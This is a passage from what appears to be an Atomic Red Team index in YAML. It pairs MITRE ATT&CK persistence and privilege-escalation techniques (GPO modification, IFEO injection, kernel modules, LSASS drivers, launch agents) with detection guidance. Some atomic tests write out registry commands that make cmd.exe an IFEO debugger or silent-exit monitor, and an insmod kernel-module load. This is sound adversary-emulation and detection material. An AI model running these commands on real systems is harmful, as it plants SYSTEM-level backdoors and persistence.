March 17). Abusing GPO Permissions. Retrieved + March 5, 2019. + - source_name: Mandiant M Trends 2016 + url: https://www.fireeye.com/content/dam/fireeye-www/current-threats/pdfs/rpt-mtrends-2016.pdf + description: Mandiant. (2016, February 25). Mandiant M-Trends 2016. Retrieved + March 5, 2019. + - source_name: Microsoft Hacking Team Breach + url: https://www.microsoft.com/security/blog/2016/06/01/hacking-team-breach-a-cyber-jurassic-park/ + description: 'Microsoft Secure Team. (2016, June 1). 
Hacking Team Breach: + A Cyber Jurassic Park. Retrieved March 5, 2019.' + - source_name: Harmj0y SeEnableDelegationPrivilege Right + url: http://www.harmj0y.net/blog/activedirectory/the-most-dangerous-user-right-you-probably-have-never-heard-of/ + description: Schroeder, W. (2017, January 10). The Most Dangerous User Right + You (Probably) Have Never Heard Of. Retrieved March 5, 2019. + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Group Policy Modification + description: "Adversaries may modify Group Policy Objects (GPOs) to subvert + the intended discretionary access controls for a domain, usually with the + intention of escalating privileges on the domain. Group policy allows for + centralized management of user and computer settings in Active Directory (AD). + GPOs are containers for group policy settings made up of files stored within + a predicable network path \\\\<DOMAIN>\\SYSVOL\\<DOMAIN>\\Policies\\.(Citation: + TechNet Group Policy Basics)(Citation: ADSecurity GPO Persistence 2016) \n\nLike + other objects in AD, GPOs have access controls associated with them. By default + all user accounts in the domain have permission to read GPOs. It is possible + to delegate GPO access control permissions, e.g. 
write access, to specific + users or groups in the domain.\n\nMalicious GPO modifications can be used + to implement many other malicious behaviors such as [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053), + [Disable or Modify Tools](https://attack.mitre.org/techniques/T1562/001), + [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105), [Create + Account](https://attack.mitre.org/techniques/T1136), [Service Execution](https://attack.mitre.org/techniques/T1569/002), + \ and more.(Citation: ADSecurity GPO Persistence 2016)(Citation: Wald0 Guide + to GPOs)(Citation: Harmj0y Abusing GPO Permissions)(Citation: Mandiant M Trends + 2016)(Citation: Microsoft Hacking Team Breach) Since GPOs can control so many + user and machine settings in the AD environment, there are a great number + of potential attacks that can stem from this GPO abuse.(Citation: Wald0 Guide + to GPOs)\n\nFor example, publicly available scripts such as New-GPOImmediateTask + can be leveraged to automate the creation of a malicious [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053) + by modifying GPO settings, in this case modifying <GPO_PATH>\\Machine\\Preferences\\ScheduledTasks\\ScheduledTasks.xml.(Citation: + Wald0 Guide to GPOs)(Citation: Harmj0y Abusing GPO Permissions) In some cases + an adversary might modify specific user rights like SeEnableDelegationPrivilege, + set in <GPO_PATH>\\MACHINE\\Microsoft\\Windows NT\\SecEdit\\GptTmpl.inf, + to achieve a subtle AD backdoor with complete control of the domain because + the user account under the adversary's control would then be able to modify + GPOs.(Citation: Harmj0y SeEnableDelegationPrivilege Right)" + id: attack-pattern--5d2be8b9-d24c-4e98-83bf-2f5f79477163 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: defense-evasion + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + modified: '2021-02-09T15:52:24.315Z' + created: 
'2020-12-28T21:50:59.844Z' + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_permissions_required: + - Administrator + - User + x_mitre_detection: |- + It is possible to detect GPO modifications by monitoring directory service changes using Windows event logs. Several events may be logged for such GPO modifications, including: + + * Event ID 5136 - A directory service object was modified + * Event ID 5137 - A directory service object was created + * Event ID 5138 - A directory service object was undeleted + * Event ID 5139 - A directory service object was moved + * Event ID 5141 - A directory service object was deleted + + + GPO abuse will often be accompanied by some other behavior such as [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053), which will have events associated with it to detect. Subsequent permission value modifications, like those to SeEnableDelegationPrivilege, can also be searched for in events associated with privileges assigned to new logons (Event ID 4672) and assignment of user rights (Event ID 4704). + x_mitre_data_sources: + - 'Active Directory: Active Directory Object Creation' + - 'Active Directory: Active Directory Object Deletion' + - 'Active Directory: Active Directory Object Modification' + - 'Command: Command Execution' + x_mitre_contributors: + - Itamar Mizrahi, Cymptom + - Tristan Bennett, Seamless Intelligence + x_mitre_platforms: + - Windows + atomic_tests: [] + T1574: + technique: + external_references: + - source_name: mitre-attack + external_id: T1574 + url: https://attack.mitre.org/techniques/T1574 + - source_name: Autoruns for Windows + url: https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns + description: Mark Russinovich. (2019, June 28). Autoruns for Windows v13.96. + Retrieved March 13, 2020. 
+ object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Hijack Execution Flow + description: |- + Adversaries may execute their own malicious payloads by hijacking the way operating systems run programs. Hijacking execution flow can be for the purposes of persistence, since this hijacked execution may reoccur over time. Adversaries may also use these mechanisms to elevate privileges or evade defenses, such as application control or other restrictions on execution. + + There are many ways an adversary may hijack the flow of execution, including by manipulating how the operating system locates programs to be executed. How the operating system locates libraries to be used by a program can also be intercepted. Locations where the operating system looks for programs/resources, such as file directories and in the case of Windows the Registry, could also be poisoned to include malicious payloads. + id: attack-pattern--aedfca76-3b30-4866-b2aa-0f1d7fd1e4b6 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + - kill_chain_name: mitre-attack + phase_name: defense-evasion + modified: '2021-04-27T19:55:20.290Z' + created: '2020-03-12T20:38:12.465Z' + x_mitre_data_sources: + - 'Windows Registry: Windows Registry Key Modification' + - 'Process: Process Creation' + - 'Module: Module Load' + - 'Command: Command Execution' + - 'Service: Service Metadata' + - 'File: File Creation' + - 'File: File Modification' + x_mitre_detection: |- + Monitor file systems for moving, renaming, replacing, or modifying DLLs. Changes in the set of DLLs that are loaded by a process (compared with past behavior) that do not correlate with known software, patches, etc., are suspicious. Monitor DLLs loaded into a process and detect DLLs that have the same file name but abnormal paths. 
Modifications to or creation of .manifest and .local redirection files that do not correlate with software updates are suspicious. + + Look for changes to binaries and service executables that may normally occur during software updates. If an executable is written, renamed, and/or moved to match an existing service executable, it could be detected and correlated with other suspicious behavior. Hashing of binaries and service executables could be used to detect replacement against historical data. + + Monitor for changes to environment variables, as well as the commands to implement these changes. + + Monitor processes for unusual activity (e.g., a process that does not use the network begins to do so, abnormal process call trees). Track library metadata, such as a hash, and compare libraries that are loaded at process execution time against previous executions to detect differences that do not correlate with patching or updates. + + Service changes are reflected in the Registry. Modification to existing services should not occur frequently. If a service binary path or failure parameters are changed to values that are not typical for that service and does not correlate with software updates, then it may be due to malicious activity. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement. + + Tools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing current service information. (Citation: Autoruns for Windows) Suspicious program execution through services may show up as outlier processes that have not been seen before when compared against historical data. 
+ x_mitre_defense_bypassed: + - Anti-virus + - Application control + x_mitre_version: '1.1' + x_mitre_is_subtechnique: false + x_mitre_platforms: + - Linux + - macOS + - Windows + atomic_tests: [] + T1546.012: + technique: + created: '2020-01-24T15:05:58.384Z' + modified: '2020-11-10T18:29:31.112Z' + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + - kill_chain_name: mitre-attack + phase_name: persistence + type: attack-pattern + id: attack-pattern--6d4a7fb3-5a24-42be-ae61-6728a2b581f6 + description: |- + Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by Image File Execution Options (IFEO) debuggers. IFEOs enable a developer to attach a debugger to an application. When a process is created, a debugger present in an application’s IFEO will be prepended to the application’s name, effectively launching the new process under the debugger (e.g., C:\dbg\ntsd.exe -g notepad.exe). (Citation: Microsoft Dev Blog IFEO Mar 2010) + + IFEOs can be set directly via the Registry or in Global Flags via the GFlags tool. (Citation: Microsoft GFlags Mar 2017) IFEOs are represented as Debugger values in the Registry under HKLM\SOFTWARE{\Wow6432Node}\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ where <executable> is the binary on which the debugger is attached. (Citation: Microsoft Dev Blog IFEO Mar 2010) + + IFEOs can also enable an arbitrary monitor program to be launched when a specified program silently exits (i.e. is prematurely terminated by itself or a second, non kernel-mode process). (Citation: Microsoft Silent Process Exit NOV 2017) (Citation: Oddvar Moe IFEO APR 2018) Similar to debuggers, silent exit monitoring can be enabled through GFlags and/or by directly modifying IFEO and silent process exit Registry values in HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\. 
(Citation: Microsoft Silent Process Exit NOV 2017) (Citation: Oddvar Moe IFEO APR 2018) + + Similar to [Accessibility Features](https://attack.mitre.org/techniques/T1546/008), on Windows Vista and later as well as Windows Server 2008 and later, a Registry key may be modified that configures "cmd.exe," or another program that provides backdoor access, as a "debugger" for an accessibility program (ex: utilman.exe). After the Registry is modified, pressing the appropriate key combination at the login screen while at the keyboard or when connected with [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001) will cause the "debugger" program to be executed with SYSTEM privileges. (Citation: Tilbury 2014) + + Similar to [Process Injection](https://attack.mitre.org/techniques/T1055), these values may also be abused to obtain privilege escalation by causing a malicious executable to be loaded and run in the context of separate processes on the computer. (Citation: Elastic Process Injection July 2017) Installing IFEO mechanisms may also provide Persistence via continuous triggered invocation. + + Malware may also use IFEO to [Impair Defenses](https://attack.mitre.org/techniques/T1562) by registering invalid debuggers that redirect and effectively disable various system and security applications. (Citation: FSecure Hupigon) (Citation: Symantec Ushedix June 2008) + name: Image File Execution Options Injection + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + external_references: + - source_name: mitre-attack + external_id: T1546.012 + url: https://attack.mitre.org/techniques/T1546/012 + - url: https://blogs.msdn.microsoft.com/mithuns/2010/03/24/image-file-execution-options-ifeo/ + description: Shanbhag, M. (2010, March 24). Image File Execution Options (IFEO). + Retrieved December 18, 2017. 
+ source_name: Microsoft Dev Blog IFEO Mar 2010 + - url: https://docs.microsoft.com/windows-hardware/drivers/debugger/gflags-overview + description: Microsoft. (2017, May 23). GFlags Overview. Retrieved December + 18, 2017. + source_name: Microsoft GFlags Mar 2017 + - url: https://docs.microsoft.com/windows-hardware/drivers/debugger/registry-entries-for-silent-process-exit + description: Marshall, D. & Griffin, S. (2017, November 28). Monitoring Silent + Process Exit. Retrieved June 27, 2018. + source_name: Microsoft Silent Process Exit NOV 2017 + - url: https://oddvar.moe/2018/04/10/persistence-using-globalflags-in-image-file-execution-options-hidden-from-autoruns-exe/ + description: Moe, O. (2018, April 10). Persistence using GlobalFlags in Image + File Execution Options - Hidden from Autoruns.exe. Retrieved June 27, 2018. + source_name: Oddvar Moe IFEO APR 2018 + - url: http://blog.crowdstrike.com/registry-analysis-with-crowdresponse/ + description: Tilbury, C. (2014, August 28). Registry Analysis with CrowdResponse. + Retrieved November 12, 2014. + source_name: Tilbury 2014 + - url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process + description: 'Hosseini, A. (2017, July 18). Ten Process Injection Techniques: + A Technical Survey Of Common And Trending Process Injection Techniques. + Retrieved December 7, 2017.' + source_name: Elastic Process Injection July 2017 + - url: https://www.f-secure.com/v-descs/backdoor_w32_hupigon_emv.shtml + description: FSecure. (n.d.). Backdoor - W32/Hupigon.EMV - Threat Description. + Retrieved December 18, 2017. + source_name: FSecure Hupigon + - url: https://www.symantec.com/security_response/writeup.jsp?docid=2008-062807-2501-99&tabid=2 + description: Symantec. (2008, June 28). Trojan.Ushedix. Retrieved December + 18, 2017. 
+ source_name: Symantec Ushedix June 2008 + x_mitre_platforms: + - Windows + x_mitre_contributors: + - Oddvar Moe, @oddvarmoe + x_mitre_data_sources: + - 'Process: Process Creation' + - 'Windows Registry: Windows Registry Key Modification' + - 'Command: Command Execution' + x_mitre_detection: |- + Monitor for abnormal usage of the GFlags tool as well as common processes spawned under abnormal parents and/or with creation flags indicative of debugging such as DEBUG_PROCESS and DEBUG_ONLY_THIS_PROCESS. (Citation: Microsoft Dev Blog IFEO Mar 2010) + + Monitor Registry values associated with IFEOs, as well as silent process exit monitoring, for modifications that do not correlate with known software, patch cycles, etc. Monitor and analyze application programming interface (API) calls that are indicative of Registry edits such as RegCreateKeyEx and RegSetValueEx. (Citation: Elastic Process Injection July 2017) + x_mitre_permissions_required: + - Administrator + - SYSTEM + x_mitre_is_subtechnique: true + x_mitre_version: '1.1' + identifier: T1546.012 + atomic_tests: + - name: IFEO Add Debugger + auto_generated_guid: fdda2626-5234-4c90-b163-60849a24c0b8 + description: 'Leverage Global Flags Settings + +' + supported_platforms: + - windows + input_arguments: + target_binary: + description: Binary To Attach To + type: Path + default: C:\Windows\System32\calc.exe + payload_binary: + description: Binary To Execute + type: Path + default: C:\Windows\System32\cmd.exe + executor: + command: 'REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image + File Execution Options\#{target_binary}" /v Debugger /d "#{payload_binary}" + +' + cleanup_command: 'reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows + NT\CurrentVersion\Image File Execution Options\#{target_binary}" /v Debugger + /f >nul 2>&1 + +' + name: command_prompt + elevation_required: true + - name: IFEO Global Flags + auto_generated_guid: 46b1f278-c8ee-4aa5-acce-65e77b11f3c1 + description: 'Leverage Global 
Flags Settings + +' + supported_platforms: + - windows + input_arguments: + target_binary: + description: Binary To Attach To + type: Path + default: C:\Windows\System32\notepad.exe + payload_binary: + description: Binary To Execute + type: Path + default: C:\Windows\System32\cmd.exe + executor: + command: | + REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_binary}" /v GlobalFlag /t REG_DWORD /d 512 + REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\#{target_binary}" /v ReportingMode /t REG_DWORD /d 1 + REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\#{target_binary}" /v MonitorProcess /d "#{payload_binary}" + cleanup_command: | + reg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_binary}" /v GlobalFlag /f >nul 2>&1 + reg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\#{target_binary}" /v ReportingMode /f >nul 2>&1 + reg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\#{target_binary}" /v MonitorProcess /f >nul 2>&1 + name: command_prompt + elevation_required: true + T1547.006: + technique: + external_references: + - source_name: mitre-attack + external_id: T1547.006 + url: https://attack.mitre.org/techniques/T1547/006 + - source_name: Linux Kernel Programming + url: https://www.tldp.org/LDP/lkmpg/2.4/lkmpg.pdf + description: Pomerantz, O., Salzman, P.. (2003, April 4). The Linux Kernel + Module Programming Guide. Retrieved April 6, 2018. + - url: http://www.tldp.org/LDP/lkmpg/2.4/html/x437.html + description: Pomerantz, O., Salzman, P. (2003, April 4). Modules vs Programs. + Retrieved April 6, 2018. + source_name: Linux Kernel Module Programming Guide + - url: http://www.megasecurity.org/papers/Rootkits.pdf + description: Chuvakin, A. (2003, February). An Overview of Rootkits. Retrieved + April 6, 2018. 
+ source_name: iDefense Rootkit Overview + - source_name: Apple Kernel Extension Deprecation + url: https://developer.apple.com/support/kernel-extensions/ + description: Apple. (n.d.). Deprecated Kernel Extensions and System Extension + Alternatives. Retrieved November 4, 2020. + - url: https://volatility-labs.blogspot.com/2012/10/phalanx-2-revealed-using-volatility-to.html + description: 'Case, A. (2012, October 10). Phalanx 2 Revealed: Using Volatility + to Analyze an Advanced Linux Rootkit. Retrieved April 9, 2018.' + source_name: Volatility Phalanx2 + - url: https://www.crowdstrike.com/blog/http-iframe-injecting-linux-rootkit/ + description: Kurtz, G. (2012, November 19). HTTP iframe Injecting Linux Rootkit. + Retrieved December 21, 2017. + source_name: CrowdStrike Linux Rootkit + - url: https://github.com/f0rb1dd3n/Reptile + description: Augusto, I. (2018, March 8). Reptile - LMK Linux rootkit. Retrieved + April 9, 2018. + source_name: GitHub Reptile + - url: https://github.com/m0nad/Diamorphine + description: Mello, V. (2018, March 8). Diamorphine - LMK rootkit for Linux + Kernels 2.6.x/3.x/4.x (x86 and x86_64). Retrieved April 9, 2018. + source_name: GitHub Diamorphine + - url: https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf + description: Wardle, P. (2015, April). Malware Persistence on OS X Yosemite. + Retrieved April 6, 2018. + source_name: RSAC 2015 San Francisco Patrick Wardle + - url: https://www.synack.com/2017/09/08/high-sierras-secure-kernel-extension-loading-is-broken/ + description: Wardle, P. (2017, September 8). High Sierra’s ‘Secure Kernel + Extension Loading’ is Broken. Retrieved April 6, 2018. + source_name: Synack Secure Kernel Extension Broken + - url: https://securelist.com/the-ventir-trojan-assemble-your-macos-spy/67267/ + description: 'Mikhail, K. (2014, October 16). The Ventir Trojan: assemble + your MacOS spy. Retrieved April 6, 2018.' 
+ source_name: Securelist Ventir + - source_name: Trend Micro Skidmap + url: https://blog.trendmicro.com/trendlabs-security-intelligence/skidmap-linux-malware-uses-rootkit-capabilities-to-hide-cryptocurrency-mining-payload/ + description: Remillano, A., Urbanec, J. (2019, September 19). Skidmap Linux + Malware Uses Rootkit Capabilities to Hide Cryptocurrency-Mining Payload. + Retrieved June 4, 2020. + - url: http://tldp.org/HOWTO/Module-HOWTO/x197.html + description: Henderson, B. (2006, September 24). How To Insert And Remove + LKMs. Retrieved April 9, 2018. + source_name: Linux Loadable Kernel Module Insert and Remove LKMs + - url: https://en.wikipedia.org/wiki/Loadable_kernel_module#Linux + description: Wikipedia. (2018, March 17). Loadable kernel module. Retrieved + April 9, 2018. + source_name: Wikipedia Loadable Kernel Module + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Kernel Modules and Extensions + description: |- + Adversaries may modify the kernel to automatically execute programs on system boot. Loadable Kernel Modules (LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. For example, one type of module is the device driver, which allows the kernel to access hardware connected to the system. (Citation: Linux Kernel Programming)  + + When used maliciously, LKMs can be a type of kernel-mode [Rootkit](https://attack.mitre.org/techniques/T1014) that run with the highest operating system privilege (Ring 0). (Citation: Linux Kernel Module Programming Guide) Common features of LKM based rootkits include: hiding itself, selective hiding of files, processes and network activity, as well as log tampering, providing authenticated backdoors and enabling root access to non-privileged users. 
(Citation: iDefense Rootkit Overview) + + Kernel extensions, also called kext, are used for macOS to load functionality onto a system similar to LKMs for Linux. They are loaded and unloaded through kextload and kextunload commands. Since macOS Catalina 10.15, kernel extensions have been deprecated on macOS systems.(Citation: Apple Kernel Extension Deprecation) + + Adversaries can use LKMs and kexts to covertly persist on a system and elevate privileges. Examples have been found in the wild and there are some open source projects. (Citation: Volatility Phalanx2) (Citation: CrowdStrike Linux Rootkit) (Citation: GitHub Reptile) (Citation: GitHub Diamorphine)(Citation: RSAC 2015 San Francisco Patrick Wardle) (Citation: Synack Secure Kernel Extension Broken)(Citation: Securelist Ventir) (Citation: Trend Micro Skidmap) + id: attack-pattern--a1b52199-c8c5-438a-9ded-656f1d0888c6 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + modified: '2021-03-30T00:59:53.716Z' + created: '2020-01-24T17:42:23.339Z' + x_mitre_version: '1.1' + x_mitre_is_subtechnique: true + x_mitre_permissions_required: + - root + x_mitre_detection: |- + Loading, unloading, and manipulating modules on Linux systems can be detected by monitoring for the following commands:modprobe, insmod, lsmod, rmmod, or modinfo (Citation: Linux Loadable Kernel Module Insert and Remove LKMs) LKMs are typically loaded into /lib/modules and have had the extension .ko ("kernel object") since version 2.6 of the Linux kernel. (Citation: Wikipedia Loadable Kernel Module) + + For macOS, monitor for execution of kextload commands and correlate with other unknown or suspicious activity. + + Adversaries may run commands on the target system before loading a malicious module in order to ensure that it is properly compiled. 
(Citation: iDefense Rootkit Overview) Adversaries may also execute commands to identify the exact version of the running Linux kernel and/or download multiple versions of the same .ko (kernel object) files to use the one appropriate for the running system.(Citation: Trend Micro Skidmap) Many LKMs require Linux headers (specific to the target kernel) in order to compile properly. These are typically obtained through the operating systems package manager and installed like a normal package. On Ubuntu and Debian based systems this can be accomplished by running: apt-get install linux-headers-$(uname -r) On RHEL and CentOS based systems this can be accomplished by running: yum install kernel-devel-$(uname -r) + x_mitre_data_sources: + - 'Command: Command Execution' + - 'File: File Creation' + - 'Kernel: Kernel Module Load' + x_mitre_contributors: + - Wayne Silva, F-Secure Countercept + - Anastasios Pingios + - Jeremy Galloway + - Red Canary + x_mitre_platforms: + - macOS + - Linux + identifier: T1547.006 + atomic_tests: + - name: Linux - Load Kernel Module via insmod + auto_generated_guid: 687dcb93-9656-4853-9c36-9977315e9d23 + description: 'This test uses the insmod command to load a kernel module for + Linux. + +' + supported_platforms: + - linux + input_arguments: + module_name: + description: Name of the kernel module name. + type: string + default: T1547006 + module_path: + description: Folder used to store the module. + type: path + default: "/tmp/T1547.006/T1547006.ko" + temp_folder: + description: Temp folder used to compile the code. + type: path + default: "/tmp/T1547.006" + module_source_path: + description: Path to download Gsecdump binary file + type: url + default: PathToAtomicsFolder/T1547.006/src + dependency_executor_name: bash + dependencies: + - description: 'The kernel module must exist on disk at specified location + +' + prereq_command: 'if [ -f #{module_path} ]; then exit 0; else exit 1; fi; + +' + get_prereq_command: | + if [ ! 
-d #{temp_folder} ]; then mkdir #{temp_folder}; touch #{temp_folder}/safe_to_delete; fi; + cp #{module_source_path}/* #{temp_folder}/ + cd #{temp_folder}; make + if [ ! -f #{module_path} ]; then mv #{temp_folder}/#{module_name}.ko #{module_path}; fi; + executor: + command: 'sudo insmod #{module_path} + +' + cleanup_command: | + sudo rmmod #{module_name} + [ -f #{temp_folder}/safe_to_delete ] && rm -rf #{temp_folder} + name: bash + elevation_required: true + T1546.006: + technique: + external_references: + - source_name: mitre-attack + external_id: T1546.006 + url: https://attack.mitre.org/techniques/T1546/006 + - url: https://www.blackhat.com/docs/us-15/materials/us-15-Wardle-Writing-Bad-A-Malware-For-OS-X.pdf + description: Patrick Wardle. (2015). Writing Bad @$$ Malware for OS X. Retrieved + July 10, 2017. + source_name: Writing Bad Malware for OSX + - url: https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf + description: Patrick Wardle. (2015). Malware Persistence on OS X Yosemite. + Retrieved July 10, 2017. + source_name: Malware Persistence on OS X + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: LC_LOAD_DYLIB Addition + description: |- + Adversaries may establish persistence by executing malicious content triggered by the execution of tainted binaries. Mach-O binaries have a series of headers that are used to perform certain operations when a binary is loaded. The LC_LOAD_DYLIB header in a Mach-O binary tells macOS and OS X which dynamic libraries (dylibs) to load during execution time. These can be added ad-hoc to the compiled binary as long as adjustments are made to the rest of the fields and dependencies. (Citation: Writing Bad Malware for OSX) There are tools available to perform these changes. + + Adversaries may modify Mach-O binary headers to load and execute malicious dylibs every time the binary is executed. 
Although any changes will invalidate digital signatures on binaries because the binary is being modified, this can be remediated by simply removing the LC_CODE_SIGNATURE command from the binary so that the signature isn’t checked at load time. (Citation: Malware Persistence on OS X) + id: attack-pattern--10ff21b9-5a01-4268-a1b5-3b55015f1847 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + - kill_chain_name: mitre-attack + phase_name: persistence + modified: '2021-03-30T00:51:58.454Z' + created: '2020-01-24T14:21:52.750Z' + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_permissions_required: + - User + x_mitre_detection: Monitor processes for those that may be used to modify binary + headers. Monitor file systems for changes to application binaries and invalid + checksums/signatures. Changes to binaries that do not line up with application + updates or patches are also extremely suspicious. + x_mitre_data_sources: + - 'Process: Process Creation' + - 'Command: Command Execution' + - 'File: File Metadata' + - 'File: File Modification' + - 'Module: Module Load' + x_mitre_platforms: + - macOS + atomic_tests: [] + T1547.008: + technique: + created: '2020-01-24T18:38:55.801Z' + modified: '2020-03-25T16:52:26.567Z' + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + type: attack-pattern + id: attack-pattern--f0589bc3-a6ae-425a-a3d5-5659bfee07f4 + description: |- + Adversaries may modify or add LSASS drivers to obtain persistence on compromised systems. The Windows security subsystem is a set of components that manage and enforce the security policy for a computer or domain. The Local Security Authority (LSA) is the main component responsible for local security policy and user authentication. 
The LSA includes multiple dynamic link libraries (DLLs) associated with various other security functions, all of which run in the context of the LSA Subsystem Service (LSASS) lsass.exe process. (Citation: Microsoft Security Subsystem) + + Adversaries may target LSASS drivers to obtain persistence. By either replacing or adding illegitimate drivers (e.g., [Hijack Execution Flow](https://attack.mitre.org/techniques/T1574)), an adversary can use LSA operations to continuously execute malicious payloads. + name: LSASS Driver + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + external_references: + - source_name: mitre-attack + external_id: T1547.008 + url: https://attack.mitre.org/techniques/T1547/008 + - url: https://technet.microsoft.com/library/cc961760.aspx + description: Microsoft. (n.d.). Security Subsystem Architecture. Retrieved + November 27, 2017. + source_name: Microsoft Security Subsystem + - url: https://technet.microsoft.com/library/dn408187.aspx + description: Microsoft. (2014, March 12). Configuring Additional LSA Protection. + Retrieved November 27, 2017. + source_name: Microsoft LSA Protection Mar 2014 + - url: https://msdn.microsoft.com/library/windows/desktop/ff919712.aspx + description: Microsoft. (n.d.). Dynamic-Link Library Security. Retrieved November + 27, 2017. + source_name: Microsoft DLL Security + - url: https://technet.microsoft.com/en-us/sysinternals/bb963902 + description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51. + Retrieved June 6, 2016. 
+ source_name: TechNet Autoruns + x_mitre_platforms: + - Windows + x_mitre_contributors: + - Vincent Le Toux + x_mitre_data_sources: + - 'Module: Module Load' + - 'Driver: Driver Load' + - 'File: File Modification' + - 'File: File Creation' + x_mitre_detection: "With LSA Protection enabled, monitor the event logs (Events + 3033 and 3063) for failed attempts to load LSA plug-ins and drivers. (Citation: + Microsoft LSA Protection Mar 2014) Also monitor DLL load operations in lsass.exe. + (Citation: Microsoft DLL Security)\n\nUtilize the Sysinternals Autoruns/Autorunsc + utility (Citation: TechNet Autoruns) to examine loaded drivers associated + with the LSA. " + x_mitre_permissions_required: + - SYSTEM + - Administrator + x_mitre_is_subtechnique: true + x_mitre_version: '1.0' + atomic_tests: [] + T1543.001: + technique: + external_references: + - source_name: mitre-attack + external_id: T1543.001 + url: https://attack.mitre.org/techniques/T1543/001 + - url: https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingLaunchdJobs.html + description: Apple. (n.d.). Creating Launch Daemons and Agents. Retrieved + July 10, 2017. + source_name: AppleDocs Launch Agent Daemons + - url: https://www.welivesecurity.com/2016/07/06/new-osxkeydnap-malware-hungry-credentials/ + description: Marc-Etienne M.Leveille. (2016, July 6). New OSX/Keydnap malware + is hungry for credentials. Retrieved July 3, 2017. + source_name: OSX Keydnap malware + - url: https://blog.malwarebytes.com/threat-analysis/2017/01/new-mac-backdoor-using-antiquated-code/ + description: Thomas Reed. (2017, January 18). New Mac backdoor using antiquated + code. Retrieved July 5, 2017. + source_name: Antiquated Mac Malware + - url: https://blog.malwarebytes.com/threat-analysis/2017/04/new-osx-dok-malware-intercepts-web-traffic/ + description: Thomas Reed. (2017, July 7). New OSX.Dok malware intercepts web + traffic. Retrieved July 10, 2017. 
+ source_name: OSX.Dok Malware + - url: https://researchcenter.paloaltonetworks.com/2016/09/unit42-sofacys-komplex-os-x-trojan/ + description: Dani Creus, Tyler Halfpop, Robert Falcone. (2016, September 26). + Sofacy's 'Komplex' OS X Trojan. Retrieved July 8, 2017. + source_name: Sofacy Komplex Trojan + - url: https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf + description: Patrick Wardle. (2014, September). Methods of Malware Persistence + on Mac OS X. Retrieved July 5, 2017. + source_name: Methods of Mac Malware Persistence + - url: https://www.synack.com/wp-content/uploads/2016/03/RSA_OSX_Malware.pdf + description: 'Patrick Wardle. (2016, February 29). Let''s Play Doctor: Practical + OS X Malware Detection & Analysis. Retrieved July 10, 2017.' + source_name: OSX Malware Detection + - url: https://www.alienvault.com/blogs/labs-research/oceanlotus-for-os-x-an-application-bundle-pretending-to-be-an-adobe-flash-update + description: Eddie Lee. (2016, February 17). OceanLotus for OS X - an Application + Bundle Pretending to be an Adobe Flash Update. Retrieved July 5, 2017. + source_name: OceanLotus for OS X + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Launch Agent + description: "Adversaries may create or modify launch agents to repeatedly execute + malicious payloads as part of persistence. Per Apple’s developer documentation, + when a user logs in, a per-user launchd process is started which loads the + parameters 